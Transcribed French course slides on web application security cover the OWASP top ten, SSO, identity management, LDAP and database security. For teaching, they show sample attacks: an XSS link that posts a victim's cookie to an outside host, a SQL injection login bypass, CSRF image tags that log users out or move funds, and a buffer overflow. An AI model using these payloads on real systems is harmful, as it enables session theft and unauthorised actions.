RSX112 Sécurité et réseaux

Dimension: px
Commencer à balayer dès la page:

Download "RSX112 Sécurité et réseaux"

Transcription

1 RSX112 Sécurité et réseaux Module 14 Sécurité des applications Web, annuaires, bases de données 1 CNAM /EBU

2 Sécurité des applications Web Projet OWASP (www.owasp.org) Publication de documents FAQ sur la sécurité des applications Guide de sécurisation Guide de revue de code Guide de test/audit de sécurité d applications Développement d outils Webscarab : Outil de tests de sécurité Web Webgoat : formation à la sécurité LAPSE : analyse de code Java Sprajax : tests d application AJAX 2 CNAM /EBU

3 Les dix failles majeures des applications Web Basé sur les analyses/observations de MITRE Gère la base CVE Référence toutes les failles Analyse CNAM /EBU

4 Version 2007 Evolutions 4 CNAM /EBU

5 Contenu Décrit des vulnérabilités, pas des attaques Attaques associées Attaques de Phishing : utilisent potentiellement toutes les vulnérabilités mais souvent XSS, et des faiblesses dans les vérifications d authentification ou d autorisation (A1, A4, A7, A10) Attaques sur les données personnelles : manque de validation et de contrôle des autorisations (A2, A4, A6, A7, A10) Vol d identité : Faiblesse ou absence de contrôles crypto (A8 and A9), inclusion de fichiers (A3) et faiblesse des contrôles d authentification et d autorisation (A4, A7, A10) Compromission de systèmes, modification ou desctruction de données : Injections (A2) et inclusion de fichiers à distance (A3) Pertes financières : Manque de contrôle des autorisation de transaction, et attaques CSRF (A4, A5, A7, A10) Perte de réputation : exploitation de n importe quelle vulnérabilité (A1 - A10) 5 CNAM /EBU

6 A1 Cross Site Scripting (XSS) Arrive à chaque fois qu une application utiliser des données envoyées par un utilisateur et l envoie vers un Navigateur Web sans valider ou encoder le contenu. Permet à un attaquant d exécuter des scripts sur le navigateur de l utilisateur et de mener des actions illicites (récupération de cookies, utilisation des droits de l utilisateur, installation de logiciels malicieux, ) 6 CNAM /EBU

7 Exemple 1 Response.Write("Welcome" & Request.QueryString("UserName")) 7 CNAM /EBU

8 Exemple 2 <a href=http://www.contoso.msft/welcome.asp?name= <FORM action=http://www. nwtraders.msft/data.asp method=post id= idform > <INPUT name= cookie type= hidden > </FORM> <SCRIPT> idform.cookie.value=document.cookie; idform.submit(); </SCRIPT> > here </a> 8 CNAM /EBU

9 A2 Faille d injection Courant dans les applications Web (notamment injection SQL) Se produit quand des données envoyées par un utilisateur sont envoyées directement à un interpréteur externe, comme partie d une requête ou d une commande L attaquant envoie des données visant à faire exécuter à l interpréteur des commandes malicieuses ou à modifier des données 9 CNAM /EBU

10 Exemple injection Modèle de développement SELECT COUNT (*) FROM Users WHERE UserName= +param1+ AND Password= +param2+ Une requête normale SELECT COUNT (*) FROM Users WHERE UserName= Jeff AND Password= imbatman Une requête frauduleuse SELECT COUNT (*) FROM Users WHERE UserName= or 1=1-- AND Password= "or 1=1" toujours vrai "--" Commentaire 10 CNAM /EBU

11 Les dix failles majeures des applications Web (2/4) A3 Exécution de fichiers malicieux Autorise un attaquant à inclure des fichiers à distances Permet d introduire du code ou des données hostiles Résultat critique : serveur compromis Affecte PHP, XML et tous les frameworks qui acceptent des noms de fichiers ou des fichiers provenant des utilisateurs A4 Référence directe non sécurisée à un objet Utilisation par un développeur d une référence directe à un objet interne (fichier, enregistrement de BdD, clé, URL, ) dans une URL ou un paramètre de FORM Un attaquant peut manipuler ces références pour accéder à ces objets ou à d autres sans autorisation A5 Requête Cross Site involontaire (Cross Site Request Forgery CSRF) Oblige le navigateur d une victime connectée à envoyer une requête à une application Web vulnérable Force une action non voulue par l utilisateur Potentiellement aussi puissant que l application qu elle utilise 11 CNAM /EBU

12 Exemples de CSRF Exemple 1 Attaque typique CSRF contre un forum Re-diriger l utilisateur vers une fonction, par exemple le logout d une application Le fait de visualiser une page contenant le tag suivant génère une requête de logout <img src="http://www.example.com/logout.php"> Exemple 2 Banque en ligne qui autorise des traitements (ex. Transfert de fonds) Attaque peut inclure le tag : <img src="http://www.example.com/transfer.do?frmacct=document.form.frmacct& toacct= &toswiftid=434343&amt= "> Attaque montrée à BlackHat 2006 Possibilité de forcer un utilisateur à modifier la configuration de son routeur ADSL Utilisation de l inteface Web Utilisation du nom de compte par défaut Raisons de l attaque Intégration automatique des éléments d authentification par le navigateur (typiquement le cookie de session) Pas de nécessité pour l attaquant de fournir un login/pasword Lien fort avec XSS Possibilité de mettre le lien dans un XSS 12 CNAM /EBU

13 Les dix failles majeures des applications Web (3/4) A6 Fuite d information et mauvaise gestion des erreurs Les applications peuvent involontairement fournir des informations sur leur configuration, leur fonctionnement interne Les données personnelles ne sont pas nécessairement protégées au bon niveau Les attaquants peuvent utiliser cette faiblesse pour voler des données sensibles ou réaliser des attaques plus complexes et plus critiques A7 Authentification insuffisante ou mauvaise gestion de session Les éléments d authentification et de compte sont souvent insuffisamment protégés Idem sur les tokens de session Les attaquants peuvent découvrir des mots de passe, des clés ou des tokens d authentification ou de session et utiliser l identité du porteur légitime 13 CNAM /EBU

14 Les dix failles majeures des applications Web (4/4) A8 Stockage non sécurisé d éléments crypto Les applications utilisent rarement les fonctions crypto correctement pour protéger les données et les éléments d authentification Les attaquants peuvent utiliser ces faiblesses pour voler des identité ou commettre d autres délits comme la fraude au numéro de carte de crédit A9 Communications non sécurisées Les applications ne chiffrent pas systématiquement le trafic réseau lorsqu il est nécessaire de protéger des données ou communications sensibles A10 Mauvais contrôle d accès aux URL Fréquemment, les applications ne protègent les fonctions sensibles qu en masquant les URL correspondantes aux utilisateurs non autorisés Les attaquants peuvent utiliser cette faiblesse pour accéder directement aux URL et réaliser des actions non autorisées 14 CNAM /EBU

15 Cycle de développement d applications Spécifications fonctionnelles Architecture technique Spécifications techniques Développement Tests unitaires Tests fonctionnels Tests d intégration Tests de Pré-production Où/quand faut-il s occuper de sécurité? 15 CNAM /EBU

16 Spécifications fonctionnelles Inclure la conformité avec la politique de sécurité de la société Les spécifications fonctionnelles peuvent inclures des besoins de sécurité Protection des informations sensibles (C, I, D) Protection des fonctions sensibles (C, I, D) Authentification Contrôle d accès Journalisation Nécessite une analyse de risques pour identifier les besoins et objectifs de sécurité 16 CNAM /EBU

17 Architecture technique Doit intégrer l infrastructure dans laquelle l application va être déployée Principe de séparation réseau (utilisateurs, administration, backup, DMZ, ) Type d accès utilisateur LAN Remote Internet Nécessité d identifier les flux entre les différents composants Protection des flux si nécessaire Mise en oeuvre IDS/IPS 17 CNAM /EBU

18 Spécifications techniques Doivent intégrer des aspects sécurité Proposition de besoins minimaux Authentification Login/password obligatoire pour les fonctions sensibles SSL pour protéger le transfert de login/password Contrôle d accès Séparer les utilisateurs des administrateurs Gérer les sessions Journalisation Identifier les connexions/déconnexions Y compris les tentatives Tracer le login et IP Assurer que l application ne diminue pas le niveau de sécurité global du SI Checklists pour la configuration des serveurs OS Serveur Web Serveur BdD Utiliser les bonnes pratiques de développement Cf. top ten des risques sur les applications Web 18 CNAM /EBU

19 Développement Appliquer les meilleures pratiques Vérifier les entrées utilisateur par rapport au format attendu Protéger les données sensibles (chiffrement, signature) Vérifier que les données sensibles ne sont pas accessibles (logs, sauvegardes, ) Utiliser des jeux de tests différents de la production pour les données sensibles Analyse de code Utiliser des outils pour découvrir d éventuels trous de sécurité Solutions Mettre en œuvre SSL pour les connexions au serveur Web (http://www.openssl.org) Mettre en œuvre des firewalls applicatifs locaux (mod_security : Mettre en œuvre des appliances sécurité dédiée Web (denyall) Mettre en œuvre du SSO Utiliser des frameworks Mettre en œuvre des annuaires (http://www.openldap.org) Utiliser des certificates (X509v3) 19 CNAM /EBU

20 Règles de bon développement Se méfier des entrées utilisateur Se protéger contre les saturations/débordements de tampon Éviter les scripts inter-site N'exigez pas d'autorisations d'administrateur système (sa) Attention au code assurant des fonctions cryptographiques Réduire votre profil d'attaque Utiliser le principe du moindre privilège Faire attention aux modes de défaillance Gérer les identités et les sessions Écrire des applications que les non-administrateurs puissent réellement utiliser 20 CNAM /EBU

21 Toute saisie est source de problème Point fondamental lors de la conception Identifier au plus tôt saisie,règles de saisie Saisie et Buffer overrun dans le code C/C++ Les formes canoniques (piège dans les url) Saisie et base de données (Sql injection) Saisie sur le Web et XSS (cross scripting site) Denis de service et robustesse des codes 21 CNAM /EBU

22 Exemple de débordement de la pile Haut de la pile void UnSafe (const char* uncheckeddata) char[4] { } char localvariable[4]; int anotherlocalvariable; strcpy (localvariable, uncheckeddata); int Adresse de retour 22 CNAM /EBU

23 Débordement de segments de mémoire Remplace les données stockées dans le segment Plus difficile à exploiter qu'un débordement de mémoire tampon strcpy Données Pointeur Données xxxxxxx Données xxxxxxx Pointeur Pointeur 23 CNAM /EBU

24 Configuration Listes de vérification pour configurer correctement les différents composants logiciels Modifier les configuration par défaut, les mots de passe par défaut, Arrêter tous les services réseau non nécessaires Activer les ACL sur les machines Java pour limiter les API autorisées aux applications 24 CNAM /EBU

25 Tests Tests d intrusion et de vulnérabilités peuvent être menés dès que les différents composants de l application sont intégrés Objectif : identifier les trous de sécurité et les corriger avant le déploiement de l application Différentes approches/niveaux 1. Les testeurs ne sont pas utilisateurs de l application testées (accès via le réseau) 2. Les testeurs sont utilisateurs de l application (accès via le réseau) 3. Les testeurs sont administrateurs de l application (accès via le réseau) 4. Les testeurs sont administrateurs système/bdd (accès complet au système) 25 CNAM /EBU

26 Démarches de tests Tests d intrusion Cas 1 (distant, sans droits sur l application) Identifier les services réseau disponibles Identifier les composants logiciels et l architecture utilisée Essayer les vulnérabilités connues sur les logiciels utilisés (serveur Web, OS, BdD, ) Essayer de se connecter à travers les services réseau disponibles Cas 2 (distant, droits utilisateur) Essayer d augmenter ses droits (accès aux fonctions d administration de l application) Essayer d accéder au système Essayer d entrer des données erronées (simuler des attaques ou des erreurs) Cas 3 (distant droits administrateur) Cf. cas 2 Cas 4 (droits administrateur locaux) Vérifier si la configuration est correcte Estimer les conséquences si un attaquant obtient les droits admin 26 CNAM /EBU

27 Comment tester? Manuellement Attaquant : être humain Utilise son savoir faire Peut adapter des outils, recompiler, Avec des outils Utilisation d un outil qui génère des attaques Scanner de vulnérabilités Web Beaucoup de false positive Beaucoup de false négatives Nécessiter d utiliser beaucoup d outils 27 CNAM /EBU

28 Standardisation des tests Pas de standard pour tester une application Web Comment tester des vulnérabilités? Différents contenus peuvent être utilisés pour détecter une vulnérabilité <script>alert(document.cookie)</script ou <body onload=alert(document.cookie)>??? Faut-il tester avec 1000xA ou xA pour détecter un buffer overfow? Comment qualifier le résultat d un test? (voir l apparition d une pop-up?) S assurer que le test a un sens (script de script de script : peu de chance que ce soit réellement exécuté) Guide de test OWASP Générique Pas technique OSSTMM (Open Source Security Testing Methodology Manual) Très détaillé Plus adapté aux OS, réseau, qu aux applications Web 28 CNAM /EBU

29 Outils Open-source Gratuits Tournent souvent sur de multiples plate-forme (souvent Java/perl/ ) Pas ou peu de reporting Nécessité d être une testeur-expert sécurité pour les utiliser Exemples Oedipus Paros Burp Intruder WebScarab Fuzzer Spike E-Or 29 CNAM /EBU

30 Outils payants Chers License basée sur une application, un serveur ou une adresse IP Très bon reporting Tournent souvent sous Windows Utilisation type «suivant suivant» Nécessité d un expert en sécurité applicative et dans l outil pour des résultats optimaux Exemples Cenzic HailStorm SPIDynamics WebInspect Sanctum AppScan Acunetix NTOspider 30 CNAM /EBU

31 Gestion des identités Fournir une identification des personnes sécurisée et de confiance Permettre l intégration de contrôles d accès logiques et physiques Configurable pour s adapter aux besoins de l activité, de la réglementation ou culturels S intégrer à l annuaire d entreprise et à d autres applications : Porte monnaie électronique, gestion de droits numériques Signature numérique Permettre une gestion centralisée et simplifiée : Des identités, des permissions et des fonctions Des éléments d authentification mots de passe, cartes à puces, tokens 31 CNAM /EBU

32 Sécuriser l environnement de l Entreprise Sécurité stations Login Windows Sécurité réseaux Firewalls, VPN, Certificats, Protection Virus, Détection d intrusion, Wireless LAN Applications Serveurs Web, Bases de données, ERP, CRM, Authentification forte et SSO pour accéder à : Stations sécurisées Réseau local Réseau distant Applications d entreprise Gestion de l authentification Mot de passe PKI/SKI Carte à puce Biométrie Tokens Gestion et prévision des utilisateurs et des groupes (optionnel) Annuaire d entreprise 32 CNAM /EBU

33 Besoins d identité électronique Menace Sécurité Interne Menace Sécurité Externe Conformité Règlements Réduction de coûts 80% des incidents de sécurité ont une origine interne la perte moyenne estimée est de $110,000 par société (InterGov, org. internationale de lutte contre la cyber criminalité) Les employés mécontents ont été le plus souvent à la source des incidents internes pour 75% des réponse à une enquête du FBI (FBI and the Computer Security Institute) Absence d authentification basée sur 2 facteurs pour les accès distants ou les VPN Accès non autorisés à des locaux (aéroport, bases militaires) Accès logiques non autorisés Mots de passe aisément devinables «Social engineering» Décrets, lois et réglementation visant à protéger les données privées à travers une authentification renforcée et la journalisation : Graham-Leach- Bliley Act (GLBA) Health Insurance Portability and Accountability Act (HIPAA) Federal Information Security Mgmt. Act (FISMA) The Patriot Act Loi informatique et liberté (CNIL) La prolifération de mots de passe augmente leurs coûts de gestion La gestion des mots de passe est une des postes de coût les plus importants dans la gestion help desk La perte de productivité des utilisateurs due aux problèmes d accès liés à la possession de plusieurs mots de passe 33 CNAM /EBU

34 Problème : la prolifération des identités électroniques Prolifération des identités électroniques Des droits et matériels multiples gérés par des départements différents Demande croissante pour des accès 24/7 à l entreprise Sécurité Physique Accès distant Paie Accès Dépt Portail partenaires Accès Internet Applications internes 34 CNAM /EBU

35 Problème : systèmes multiples > coûts élevés Dilemme : Répondre aux besoins de sécurité vs. Coût et complexité Password5 Coût total de la gestion d identié Token Password4 Password3 PKI & Password2 Building Access on Card Picture ID on Card Confiance (Sécurité, exploitabilité et facilité d utilisation) 35 Corporate Overview CNAM /EBU

36 Solution : la nouvelle courbe des services d identité électronique PIN Biometric Infrastructure de gestion d identité ROI de la gestion d identité Facilité d utilisation Réduction des coût (TCO) Sécurité améliorée Password5 Coût total de la gestion d identité Password4 Password3 PKI & Password2 Building Access on Card Picture ID on Card Token Static Passwords Confiance (Sécurité, Exploitabilité et facilité d utilisation) 36 CNAM /EBU

37 Utilisateur nomade Sécuriser l accès à l Entreprise Connexion machine Connexion Distante Connexion Réseau Local SAP PSOFT Exchange Accès Bâtiment Main Frame Applications Entreprise Web App Web App Web App Utilisateur local 37 CNAM /EBU

38 Solutions d identité électronique Aperçu des solutions Solutions Digital ID Card Contrôle d accès par carte à puce Photo ID badge Physical Access Card Remote Access Card Secure Desktop Card Secure Sign-on Card Solutions Secure Desktop Secure Workstation Login sécurisé Verrouillage de session Services de chiffrement (Files, Disk, ) Solutions Accès distants sécurisés Enterprise RAS Dialup VPN Web Access Wireless LAN Financial RAS B2B & B2C Banking Solutions Secure Sign-On Secure Sign-on Workstation Login Network Login Application sign-on Web app sign-on Automated Password Management Plateforme de gestion des identités électroniques Card Middleware et ID Applet Suite Management matériel Management authentification Card Middleware for Windows, Mac, Linux & Unix ID Applet Suite: PIN, PKI, One-Time Password, Secure Container, Biometric Match on Card Délivrance, Gestion, Préparation des packages Devices: Smart Cards, Tokens, USB Keys Délivrance, Gestion, Préparation des packages Passwords, One-Time Passwords, Digital Certificates, Key Management, Biometrics Administration Help Desk, Self Service, Auditing & Reporting 38 CNAM /EBU

39 Décomposition fonctionnelle d IdM Objectifs et fonctions principales Enregistrement Gestion Identification Vérification Credentialing Gestion des droits Provisioning Workflow Fédération Fédération Fonctions IdM ID unique global Niveau d assurance de l identité Certificats X509, Tokens / Cards Password, Biometrie Gestion des rôles (Entitlements / Subscriptions) Gestion des accès (ACL / Rule Management) Gestion des comptes utilisateur (Login IDs) Gestion des profils Gestion et synchronisation de mots de passe Gestion des demandes Intégration d évènements Administration déléguée Auto-gestion Technologies sous-jacentes Global ID Service PKI / Kerberos Syst. à 2 facteurs Service RBAC Workflow Provisioning Meta-Annuaire Service Annuaire Application Application Conformité Authentification Autorisation Fédération Audit & Reporting Authentification utilisateurs & SSO Services d autorisation Contrôle des accès avec privilèges Journalisation et reporting Supervision sécurité Portail / Web SSO Service Plateforme Appliances AuthN Service AuthZ Service 39 CNAM /EBU

40 Évolutions des services IdM Intégration & Synchronisation Meta-annuaire, Provisioning utilisateur, EAI, WS, integration spécifique Contrôle d Accès Provisioning, modélisation RBAC, Règles de gestion Workflow Schéma d approbation, ticketing, facturation, gestion automatisée de données Complétude Value to Vision IdM Services d annuaire Stockage d identités et de profils. Stockage de données d application Services d identifiants Identifiant unique et global, outils d activation Self-Services Enregistrement, administration déléguée, gestion de profil, Organisation Services Opérationnels Standard templates, deployments, operational processes and toolset ID & PW uniques Synchronisation de login/password sur les postes de travail et Web Services fédérateurs Web services intégration via SAML, DSML, SPML, ebxml, etc. Services d authentification Authentification centralisée, cartes / tokens ID, PKI, Web- SSO Planning de mise en oeuvre 40 CNAM /EBU

41 Synthèse IdM Problèmes Conséquences Solutions Bénéfices Compte inutilisés, pas de suppression de comptes Risques de failles de sécurité, pas d imputabilité Outils de découverte et de suppression des compte inutilisés Conformité en cas d audit; amélioration de la sécurité Information utilisateur périmée; méthodes de mise à jour complexes Coûts administratifs et opérationnels ; diminution de l efficacité Règles de synchronisation des profils; interfaces de self services Information à jour ; mis à jour aisée par l utilisateur final Stratégies de password hétérogènes Coûts helpdesk élevés; faible expériences des utilisateurs Infrastructure globale de synchronisation et reset de password Réduction des coûts de helpdesk et expérience des utilisateurs Multiples processus redondants pour l ajout et le retrait de nouveaux collaborateurs Duplication de login pour un même utilisateur due à la complexité Elargir le périmètre des META systèmes au solutions de provisioning Enregistrement d un nouvel utilisateur automatisé; réduction des dépenses associées Stockages de données spécifiques; pas de partage de données Pas de mutualisation de login dans les systèmes Partage temps réel de données globales; consolidation des domaines d authentification Amélioration de l expérience de SSO; possibilité d admin. centralisée Utilisation d informations personnelles comme identifiant unique dans les systèmes Problème potentiel sur le traitement de données personnelles Intégration des contraintes réglementaires pour les identifiants uniques Non-repudiation par un individu de son login 41 CNAM /EBU

42 SSO Objectifs Idéalement Un seul mot de passe Saisi une seule fois Dans les faits Beaucoup d applications/systèmes ont leur propre mécanisme de login Réduire le nombre de login/password Réduire le risque lié aux mots de passe Un seul à retenir Plus complexe Changé plus souvent Attention à ne pas augmenter le risque! Réduction des coûts Amélioration du confort Terminologie SSO : Single Sign On (une seule authentification pour toutes les applications/systèmes) CSO : Common Sign On (authentification identique pour toutes les applications/systèmes) 42 CNAM /EBU

43 Analyse des coûts Economies Coût d un reset de password Moins de resets à faire Self service Coûts de X connexions Dépenses Coût d intégration Coût d acquisition Coût de gestion 43 CNAM /EBU

44 Risques Single Point of Failure (SPOF) Augmentation du risque d indisponibilité Point d attaque privilégié pour du DoS Vole d éléments d authentification par des implémentations nonsécurisée Projet trop ambitieux Combiner physique, réseau, systèmes, applications Procédures complexes Complexité d intégration Difficulté d intégrer l historique OS/390, AS/400, applications Client/Server, RADIUS Nécessité d intégrer les réglementations CNIL/Directive Européenne LSF SOX Santé / HIPAA CNAM /EBU

45 Catégories de SSO SSO traditionnel Synchronisation de mot de passe Serveurs d authentification Solutions de login Web 45 CNAM /EBU

46 SSO traditionnel (1/3) Permet à un utilisateur de s authentifier une seule fois Accès possible à des applications/systèmes/ multiples Peut gérer aussi du contrôle d accès et de l autorisation Quelles sont les applications autorisées Dans ces applications, quelles sont les fonctions autorisées Concept ancien Kerberos Radius 46 CNAM /EBU

47 SSO traditionnel (2/3) Fonctionnement Authentification initiale Stockage des éléments nécessaires localement Présentation de ces éléments de façon transparente aux applications/systèmes Elément unique vs éléments multiples API et DLL Nécessité d implémenter le système pour toutes les applications concernées Scripts Jouent les authentifications de façon transparente Cookie Uniquement Web 47 CNAM /EBU

48 SSO traditionnel (3/3) Avantages Simple d utilisation Réduit les coûts de support Réduit les cycles de connexion Inconvénients Intégration des applications historiques coûteuse et longue SPOF Solutions de script conduisent souvent à stocker localement les login/password sur le poste client 48 CNAM /EBU

49 CSO Synchronisation de mots de passe (1/2) Centralisation de la gestion des mots de passe Possibilité d appliquer une politique globale Propagation sur les différents systèmes autorisés pour un utilisateur donné Scripts bi-directionnels ou gestion centralisée Fonctionnement Agents locaux qui modifient les mots de passe Ou redirection de l authentification vers un serveur central 49 CNAM /EBU

50 Synchronisation de mots de passe (2/2) Avantages Un seul mot de passe à retenir Relativement simple à implémenter Reste possible par le HelpDesk sur l ensemble des systèmes depuis une seule console Possibilité d imposer une politique de mot de passe Vision centrale des autorisations Inconvénients Ne diminue pas le nombre de connexions/authentifications Ne gère que les authentifications par mot de passe 50 CNAM /EBU

51 Serveurs d authentification Passerelles frontales Gère l authentification de l utilisateur Plusieurs niveaux possibles Plusieurs types d authentification possibles (CàP, Biométrie, certificats, ) Relai ou réalisation de l authentification vers les serveurs/applications Type proxy Nécessité d une couche d authentification SPOF 51 CNAM /EBU

52 Solutions Web Login unique pour accéder à de multiples sites Deux architectures Frontal Type portail/passerelle Fonctionnement reverse-proxy Modification légère sur les applications Agent / Back office Connexion sur les serveurs Web Interrogation par les serveurs Web d un serveur central Stockage des éléments d autorisation Cookie Etat sur le serveur 52 CNAM /EBU

53 Référentiel d utilisateurs : LDAP Lightweight Directory Access Procol Déclinaison simplifiée de la norme X500 5 modèles: Modèle d information Modèle de nommage Modèle fonctionnel Modèle de sécurité Modèle de réplication 53 CNAM /EBU

54 Modèle d information Entrée = Objet Une entrée contient un ensemble d attributs (utilisateurs ou opérationnels) Classe d objet: définit les attributs que doit contenir un objet Classe abstraite, structurelle ou auxiliaire Possibilité d héritage Le schéma de l annuaire contient les classes d objets Le schéma de l annuaire permet de vérifier le respect de la syntaxe des données 54 CNAM /EBU

55 Modèle de nommage Contraintes de nommage pour garantir l interopérabilité entre annuaires DIT (directory information tree) : définit l organisation et la désignation des données Deux types d objets Nœuds Feuilles Une racine (entrée vide) Chaque entrée est identifiée de manière unique Relative Distinguished Name Distinguished Name 55 CNAM /EBU

56 Exemple de nommage 56 CNAM /EBU

57 Syntaxe structurée Définition d un schéma Chaque classe a sa propre syntaxe Définit les attributs possibles/obligatoires/ Chaque attribut a sa syntaxe Type d information Liste des valeurs possibles Possibilité de comparaison 57 CNAM /EBU

58 Modèle fonctionnel Le modèle fonctionnel décrit la manière d accéder aux données Fonctions d interrogation: search, compare Paramètres: base object, scope, derefaliases, size limit, time limit, attronly, search filter Fonctions de mise à jour: add, modify, delete, rename Fonctions de session: bind, unbind 58 CNAM /EBU

59 Modèle de sécurité Définir pour chaque utilisateur des droits d accès aux données (authentification, liste de contrôle d accès) Garantir la confidentialité des échanges (chiffrement) 59 CNAM /EBU

60 Modèle de réplication Dupliquer un annuaire sur plusieurs serveurs Prévenir les coupures réseau, les surcharges de service ou les pannes de serveur Structure maître-esclave Synchronisation totale/incrémentale Réplication en temps réel/à heure fixe 60 CNAM /EBU

61 Communication client-serveur TCP/IP : port 389 / 636 (SSL) Mécanisme de questions-réponses sous forme de messages Traitement synchrone ou asynchrone Cas asynchrone: attribution d un numéro de contexte 61 CNAM /EBU

62 OpenLDAP : Création de l arbre des données 62 CNAM /EBU

63 OpenLDAP : ajout de données 63 CNAM /EBU

64 Sécurité LDAP Protection des échanges réseau SSL Authentification SASL Plusieurs mécanismes possibles Syntaxe imposée Contrôle d accès ACL 64 CNAM /EBU

65 Exemple OpenLDAP <access> clause : [[real]self]{<level> <priv>} <level> ::= none disclose auth compare search read write <priv> ::= {= + -}{w r s c x d 0}+ 65 CNAM /EBU

66 ACL de base access to attr=userpassword by self =xw by anonymous auth access to * by self write by users read 66 CNAM /EBU

67 Sécurité des bases de données Budgets Sécurité vont d'abord à l'achat de système de sécurité (firewalls, IDS,...) à la formation à la sécurisation des applications le SGBD est le parent pauvre de la sécurité Complexité Les BD sont une affaire de spécialistes: au niveau de leur gestion : DBA au niveau de la programmation On ne peut pas sérieusement faire de l'oracle deux fois par an Quand c'est le cas, la sécurité est encore pire! 67 CNAM /EBU

68 Contraintes sur la sécurité Rôle du DBA maintenir le SGBD gérer les comptes, les applications,... pas de formation sécurité : ne peut pas «imaginer» les attaques possibles Mises à jour des systèmes d'expérience, 80% des serveurs de BD meurent avec le système et le SGBD initial: (Informix 7.2, Oracle 7.2,...) «If it works, don't fix it» Conséquence : de nombreuses failles système et applicatives ne sont JAMAIS corrigées, surtout sur les réseaux internes Criticité des applications : Arrêts impossibles La sécurité passe en dernier 68 CNAM /EBU

Sécurité des bases de données Nicolas Jombart Alain Thivillon

Sécurité des bases de données Nicolas Jombart Alain Thivillon HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Sécurité des bases de données Nicolas Jombart Alain Thivillon Place

Plus en détail

Single Sign-On : Risques & Enjeux

Single Sign-On : Risques & Enjeux Single Sign-On : Risques & Enjeux TAM esso Tivoli Access Manager for Entreprise Single-Sign ON Charles Tostain charles.tostain@fr.ibm.com 13 Agenda Risques & Définition Tivoli Access Manager for E-SSO

Plus en détail

Gestion des identités Christian-Pierre Belin

Gestion des identités Christian-Pierre Belin Gestion des identités Christian-Pierre Belin Architecte Microsoft France La gestion des identités Le périmètre et les rôles Services d annuaire Point de stockage et d administration des comptes, des informations

Plus en détail

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement Guillaume HARRY l Contenu sous licence Creative Commons CC-BY-NC-ND Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement P. 2 1. Introduction 2.

Plus en détail

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI OWASP Open Web Application Security Project Jean-Marc Robert Génie logiciel et des TI A1: Injection Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est

Plus en détail

PortWise Access Management Suite

PortWise Access Management Suite Créez un bureau virtuel pour vos employés, partenaires ou prestataires depuis n importe quel endroit et n importe quel appareil avec Portwise Access Manager et Authentication Server. Fournir des accès

Plus en détail

Digital DNA Server. Serveur d authentification multi-facteurs par ADN du Numérique. L authentification de confiance

Digital DNA Server. Serveur d authentification multi-facteurs par ADN du Numérique. L authentification de confiance L authentification de confiance Digital DNA Server Serveur d authentification multifacteurs par ADN du Numérique Simplicité Rapidité Economie Liberté Evolutivité Fiabilité FR mar 205 www.loginpeople.com

Plus en détail

DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES

DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES et après? 3 avril 2012 www.advens.fr Document confidentiel - Advens 2012 Etat des lieux en 2012 Augmentation de la fréquence et de la complexité des attaques

Plus en détail

Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones.

Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones. PERSPECTIVES Le Single Sign-On mobile vers Microsoft Exchange avec OWA et ActiveSync Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des

Plus en détail

Vulnérabilités et sécurisation des applications Web

Vulnérabilités et sécurisation des applications Web OSSIR 09/09/2002 Vulnérabilités, attaques et sécurisation des applications Web Pourquoi les firewalls sont impuissants patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Page 1 Planning

Plus en détail

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Pourquoi revoir la sécurité des applications Web Des technologies omniprésentes Facilité de mise en œuvre et de déploiement. Commerce en ligne,

Plus en détail

CIBLE DE SECURITE CSPN DU PRODUIT PASS. (Product for Advanced SSO)

CIBLE DE SECURITE CSPN DU PRODUIT PASS. (Product for Advanced SSO) CIBLE DE SECURITE CSPN DU PRODUIT PASS (Product for Advanced SSO) Préparé pour : ANSSI Préparé par: Thales Communications & Security S.A. 4 Avenue des Louvresses 92622 GENNEVILLIERS CEDEX France This document

Plus en détail

Vulnérabilités et sécurisation des applications Web

Vulnérabilités et sécurisation des applications Web Rencontres SPIRAL 25/02/03 Vulnérabilités et sécurisation des applications Web Pourquoi les firewalls sont impuissants face à certaines attaques patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com

Plus en détail

La haute disponibilité de la CHAINE DE

La haute disponibilité de la CHAINE DE Pare-feu, proxy, antivirus, authentification LDAP & Radius, contrôle d'accès des portails applicatifs La haute disponibilité de la CHAINE DE SECURITE APPLICATIVE 1.1 La chaîne de sécurité applicative est

Plus en détail

Groupe Eyrolles, 2004 ISBN : 2-212-11504-0

Groupe Eyrolles, 2004 ISBN : 2-212-11504-0 Groupe Eyrolles, 2004 ISBN : 2-212-11504-0 Table des matières Avant-propos................................................ 1 Quel est l objectif de cet ouvrage?............................. 4 La structure

Plus en détail

Sécuriser l accès aux applications et aux données. Charles Tostain, André Deville, Julien Bouyssou IBM Tivoli Sécurité

Sécuriser l accès aux applications et aux données. Charles Tostain, André Deville, Julien Bouyssou IBM Tivoli Sécurité Sécuriser l accès aux applications et aux données Charles Tostain, André Deville, Julien Bouyssou IBM Tivoli Sécurité 2 Agenda Gérer les identités : pourquoi et comment? Tivoli Identity Manager Express

Plus en détail

La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet

La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet REALSENTRY TM Gestion, Performance et Sécurité des infrastructures Web La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet L authentification

Plus en détail

Présentation de la solution Open Source «Vulture» Version 2.0

